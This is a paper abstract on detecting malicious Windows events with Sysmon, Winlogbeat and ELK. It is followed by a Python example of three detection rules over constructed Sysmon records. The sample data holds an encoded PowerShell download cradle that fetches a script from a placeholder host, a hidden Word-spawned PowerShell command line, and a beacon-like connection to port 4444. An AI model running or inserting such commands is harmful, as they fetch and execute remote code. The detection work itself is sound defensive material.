Detecting and Analyzing the Malicious Windows Events using Winlogbeat and ELK Stack
J. N. Praneeth1, M. Sreedevi2

1J. N. Praneeth, M.Tech Student, Department of Computer Science and Engineering, Koneru Lakshmaiah Educational Foundation, Vaddeswaram, Guntur (Andhra Pradesh), India.
2M. Sreedevi, Professor, Department of Computer Science and Engineering, Koneru Lakshmaiah Educational Foundation, Vaddeswaram, Guntur (Andhra Pradesh), India.
Manuscript received on 25 March 2019 | Revised Manuscript received on 06 April 2019 | Manuscript Published on 18 April 2019 | PP: 716-720 | Volume-7 Issue-6S March 2019 | Retrieval Number: F03400376S19/2019©BEIESP
© The Authors. Blue Eyes Intelligence Engineering and Sciences Publication (BEIESP). This is an open access article under the CC-BY-NC-ND license (http://creativecommons.org/licenses/by-nc-nd/4.0/)

Abstract: Nowadays most IT companies and organizations running Windows operating systems are being compromised by cyber-attacks and intrusions that affect confidentiality, integrity or availability. This makes the security analyst's job of analyzing Windows event logs and detecting malicious events more complicated, so log monitoring has to be provided in a sophisticated way in order to withstand such attacks. The biggest challenge for IT companies is maintaining a log monitoring and analysis platform cost-effectively: several tools are available only as commercial editions and can be expensive. For companies that want a cost-effective option, the open-source ELK stack can be used for log monitoring and analysis. In this work the ELK stack, an open-source log monitoring platform, is used together with the Sysmon tool, which records activity on a Windows operating system and is used here to identify malicious activities. Winlogbeat, a lightweight log shipper, ships the Windows event logs to the ELK stack. This log analysis is useful for monitoring and detecting malicious Windows events, and the same process can also be used to build a small SOC service.
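The abstract describes the pipeline (Sysmon writes to the Microsoft-Windows-Sysmon/Operational channel, Winlogbeat ships that channel to Elasticsearch, analysts then hunt for malicious events) but not what a detection over the shipped documents looks like. The example below is added here and is not the paper's code: it runs three simple detections over constructed sample records whose field layout (winlog.event_id, winlog.record_id, winlog.event_data.Image, ParentImage, CommandLine, DestinationIp, DestinationPort) is assumed to follow what Winlogbeat 7.x emits for Sysmon; the hostnames, paths, IPs and the encoded PowerShell payload are invented sample data. The rules (an Office application spawning a shell, an encoded PowerShell command line that decodes to a download cradle, and a network connection from a user-writable directory) are illustrative choices, not rules the paper states.

```python
"""Toy detections over Winlogbeat-shipped Sysmon events (added example, not the paper's code).

Assumption: documents follow the Winlogbeat 7.x layout for the
Microsoft-Windows-Sysmon/Operational channel (winlog.event_id, winlog.event_data.*).
All sample data below is constructed. Sysmon event IDs used: 1 = process create,
3 = network connection, 11 = file created.
"""
import base64
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# PowerShell accepts any unambiguous prefix of -EncodedCommand; the base64 blob follows it.
ENC_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
USER_WRITABLE = re.compile(r"\\(?:AppData\\Local\\Temp|Users\\Public|Windows\\Temp)\\", re.IGNORECASE)
DOWNLOAD_CRADLE = re.compile(r"downloadstring|iex\b|invoke-expression", re.IGNORECASE)

# Constructed payload: PowerShell -EncodedCommand takes base64 of the UTF-16LE script text.
DECODED_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
ENCODED_PAYLOAD = base64.b64encode(DECODED_PAYLOAD.encode("utf-16-le")).decode("ascii")


def make_event(record_id, event_id, **event_data):
    """Build a Winlogbeat-shaped document (constructed; field names are an assumption)."""
    return {
        "@timestamp": f"2019-03-25T10:00:{record_id:02d}.000Z",
        "host": {"name": "WKS-SAMPLE"},
        "winlog": {
            "channel": "Microsoft-Windows-Sysmon/Operational",
            "record_id": record_id,
            "event_id": event_id,
            "event_data": event_data,
        },
    }


# Constructed sample events: one benign process create, one Word -> cmd -> encoded
# PowerShell chain, one beacon-like connection from %TEMP%, one normal browser
# connection, one file-create event no rule looks at.
SAMPLE_EVENTS = [
    make_event(1, 1, Image=r"C:\Windows\System32\notepad.exe",
               ParentImage=r"C:\Windows\explorer.exe", CommandLine="notepad.exe"),
    make_event(2, 1, Image=r"C:\Windows\System32\cmd.exe",
               ParentImage=r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
               CommandLine=f"cmd.exe /c powershell.exe -nop -w hidden -enc {ENCODED_PAYLOAD}"),
    make_event(3, 3, Image=r"C:\Users\alice\AppData\Local\Temp\update.exe",
               DestinationIp="203.0.113.10", DestinationPort="4444"),
    make_event(4, 3, Image=r"C:\Program Files\Mozilla Firefox\firefox.exe",
               DestinationIp="198.51.100.7", DestinationPort="443"),
    make_event(5, 11, Image=r"C:\Windows\System32\svchost.exe",
               TargetFilename=r"C:\Windows\Temp\x.tmp"),
]


def basename(path):
    """Last component of a Windows path, lower-cased for comparison."""
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the decoded script if the command line carries -EncodedCommand, else None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def detect(event):
    """Apply the three toy rules to one document; return the list of rule names that fired."""
    winlog = event.get("winlog", {})
    data = winlog.get("event_data", {})
    # Winlogbeat may index event_id as a string; normalize before comparing.
    event_id = int(winlog.get("event_id", 0))
    hits = []
    if event_id == 1:
        parent, child = basename(data.get("ParentImage", "")), basename(data.get("Image", ""))
        if parent in OFFICE_PARENTS and child in SHELL_CHILDREN:
            hits.append(f"office-spawns-shell: {parent} -> {child}")
        decoded = decode_encoded_command(data.get("CommandLine", ""))
        if decoded is not None:
            hits.append("powershell-encoded-command")
            if DOWNLOAD_CRADLE.search(decoded):
                hits.append("encoded-download-cradle")
    elif event_id == 3:
        if USER_WRITABLE.search(data.get("Image", "")):
            hits.append("network-from-user-writable-path: "
                        f"{data.get('DestinationIp')}:{data.get('DestinationPort')}")
    return hits


def run(events):
    """Return one alert per document that triggered at least one rule."""
    alerts = []
    for event in events:
        hits = detect(event)
        if hits:
            alerts.append({"timestamp": event["@timestamp"],
                           "record_id": event["winlog"]["record_id"], "hits": hits})
    return alerts


if __name__ == "__main__":
    for alert in run(SAMPLE_EVENTS):
        print(alert["timestamp"], alert["record_id"], ", ".join(alert["hits"]))
```

In the real pipeline these documents come from Elasticsearch rather than an in-memory list; Winlogbeat is pointed at the Sysmon channel with a `winlogbeat.event_logs` entry for `Microsoft-Windows-Sysmon/Operational` in winlogbeat.yml and an `output.elasticsearch` section. The same rules could be expressed as Kibana saved searches, but decoding the `-EncodedCommand` blob before matching is the step a plain keyword search misses.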
Keywords: ELK Stack, Winlogbeat, Sysmon, Malware Detection, Log Monitoring.
Scope of the Article: Monitoring and Management